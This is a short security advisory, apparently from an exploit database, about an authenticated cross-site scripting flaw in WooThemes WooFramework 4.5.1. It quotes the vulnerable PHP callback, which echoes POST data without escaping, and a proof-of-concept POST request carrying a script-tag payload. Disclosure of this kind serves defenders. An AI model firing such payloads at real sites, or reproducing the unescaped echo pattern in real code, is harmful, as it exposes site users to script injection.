WooThemes WooFramework 4.5.1 Cross Site Scripting

2015.04.27
Credit: Evex
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

------------------------------------------------------------------------------ WooThemes WooFramework 4.5.1 Authenicated Cross Site Scripting (XSS) ------------------------------------------------------------------------------ [-] Vulnerability Description: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) the vulnerability is in function "woo_sbm_callback": Vuln Code: function woo_sbm_callback() { ... $save_type = $_POST['type']; ... if($save_type == 'woo_sbm_get_links'){ $data = $_POST['data']; parse_str($data,$data_array); $type = $data_array['type']; $slug = $data_array['slug']; $name = $data_array['name']; $id = $data_array['id']; ... ... echo "$type|$name|$slug|$id|$url|$conditional"; } ... } add_action( 'wp_ajax_woo_sbm_post_action', 'woo_sbm_callback' ); [-] Proof Of Concept: URL: http://localhost/x/wordpress/wp-admin/admin-ajax.php?action=woo_sbm_post_action Post Data: type=woo_sbm_get_links&data=type=<script>alert(1)</script> [-] Fix / Solution: Update to latest framework.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top